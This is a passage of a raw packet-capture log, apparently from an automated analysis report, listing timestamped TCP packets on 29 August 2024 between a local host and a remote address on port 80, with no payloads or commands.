                                Aug 29, 2024 22:47:02.280711889 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280730009 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280731916 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.280742884 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280751944 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.280754089 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280775070 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.280775070 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280787945 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280796051 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.280797005 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280813932 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280822992 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.280824900 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280836105 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280838966 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.280847073 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.280863047 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.280884981 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.281718016 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281728983 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281738997 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281754017 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.281773090 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.281795025 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281805992 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281816006 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281827927 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281830072 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.281838894 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281850100 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281852007 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.281873941 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.281888008 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.281888962 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281900883 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.281922102 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.281930923 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282072067 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282083035 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282093048 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282111883 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282125950 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282129049 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282140970 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282150030 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282154083 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282162905 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282171965 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282174110 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282186985 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282196999 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282202959 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282208920 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282213926 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282224894 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282234907 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282236099 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282246113 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282255888 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282258034 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282269001 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282274008 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282286882 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282298088 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282300949 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282315016 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282318115 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282330036 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282335997 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282340050 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282351017 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282356977 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282361031 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282371044 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282380104 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282382965 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282393932 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282403946 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282406092 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282416105 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282418966 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282429934 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282442093 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282445908 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282465935 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282466888 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282478094 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282485008 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282488108 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282499075 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282504082 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282509089 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282520056 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.282520056 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282548904 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.282560110 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284054041 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284101009 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284112930 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284123898 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284151077 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284198999 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284209967 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284220934 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284238100 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284250021 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284313917 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284324884 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284334898 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284347057 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284353018 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284358025 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284369946 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284380913 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284392118 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284394979 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284401894 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284413099 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284415960 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284423113 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284444094 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284456968 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284595966 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284612894 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284624100 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284631968 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284635067 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284646034 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284651995 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284657001 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284662962 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284667969 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284677982 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284687996 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284689903 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284698963 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284708023 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284709930 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284719944 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284720898 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284744978 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284745932 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284764051 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284768105 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284775019 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284785032 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284791946 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284796953 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284797907 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284806013 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284816980 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284818888 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284827948 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284838915 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284841061 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284848928 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.284861088 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284868002 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.284888983 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366596937 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366609097 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366626024 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366638899 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366648912 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366661072 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366671085 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366672039 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366684914 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366695881 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366704941 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366714954 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366714954 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366725922 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366734028 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366739035 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366755009 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366767883 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366769075 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366780043 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366789103 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366803885 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366803885 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366815090 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366825104 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366833925 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366853952 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366868973 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366883039 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366894960 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366904020 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366914988 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366925001 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366926908 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.366950035 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.366964102 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367525101 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367535114 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367552042 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367574930 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367580891 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367592096 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367594004 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367603064 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367619038 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367645025 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367649078 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367655993 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367666960 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367679119 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367682934 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367708921 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367714882 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367727995 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367727995 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367748976 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367758989 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367765903 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367769957 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367779970 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.367794037 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367803097 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.367822886 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.368546963 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368565083 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368577003 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368632078 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.368695974 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368706942 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368719101 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368733883 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.368757010 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.368782043 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368793964 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368803978 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368817091 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.368824959 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368837118 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368844032 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.368846893 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368861914 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368866920 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.368870974 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368885040 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.368906975 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.368964911 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368976116 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368985891 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.368998051 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369008064 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369015932 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369020939 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369026899 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369043112 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369044065 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369055986 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369061947 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369075060 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369083881 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369086027 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369095087 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369108915 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369108915 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369132042 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369134903 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369153976 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369159937 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369170904 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369175911 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369182110 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369191885 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369196892 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369204044 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369204998 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369216919 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369226933 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369232893 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369244099 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369255066 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369265079 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369266033 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369275093 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369285107 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369307041 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369308949 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369319916 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369329929 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369339943 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369348049 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369358063 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369359970 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369369030 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369379044 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369384050 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369389057 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.369402885 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.369426966 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.370743990 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.370795012 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.370800018 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.370809078 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.370826006 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.370835066 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.370836020 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.370852947 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.370872021 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.370876074 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.370886087 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.370894909 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.370904922 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.370913982 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.370923996 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.370953083 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371125937 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371139050 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371149063 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371160030 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371170998 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371181011 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371186018 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371191025 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371201992 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371226072 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371244907 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371258020 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371269941 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371279001 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371289968 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371294022 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371306896 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371320009 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371341944 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371352911 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371364117 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371375084 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371375084 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371393919 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371421099 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371449947 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371460915 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371470928 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371481895 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371486902 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371494055 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371505022 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371510983 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.371517897 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.371529102 CEST4973080192.168.2.4104.21.2.6
